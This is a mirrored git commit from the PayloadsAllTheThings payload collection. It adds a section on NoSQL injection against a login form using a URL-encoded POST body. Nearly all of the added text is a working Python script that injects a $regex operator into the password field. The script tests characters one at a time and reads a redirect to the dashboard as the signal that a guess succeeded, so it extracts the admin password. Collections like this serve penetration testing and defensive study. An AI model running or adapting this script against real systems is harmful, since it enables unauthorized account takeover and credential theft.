mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
NoSQLi: add POST with urlencoded body
This commit is contained in:
parent
7d9dd6806e
commit
e0f851e6e9
1 changed files with 24 additions and 0 deletions
|
@ -98,6 +98,30 @@ while True:
|
|||
password += c
|
||||
```
|
||||
|
||||
### POST with urlencoded body
|
||||
|
||||
```python
|
||||
import requests
|
||||
import urllib3
|
||||
import string
|
||||
import urllib
|
||||
urllib3.disable_warnings()
|
||||
|
||||
username="admin"
|
||||
password=""
|
||||
u="http://example.org/login"
|
||||
headers={'content-type': 'application/x-www-form-urlencoded'}
|
||||
|
||||
while True:
|
||||
for c in string.printable:
|
||||
if c not in ['*','+','.','?','|','&','$']:
|
||||
payload='user=%s&pass[$regex]=^%s&remember=on' % (username, password + c)
|
||||
r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
|
||||
if r.status_code == 302 and r.headers['Location'] == '/dashboard':
|
||||
print("Found one more char : %s" % (password+c))
|
||||
password += c
|
||||
```
|
||||
|
||||
### GET
|
||||
|
||||
```python
|
||||
|
|
Loading…
Reference in a new issue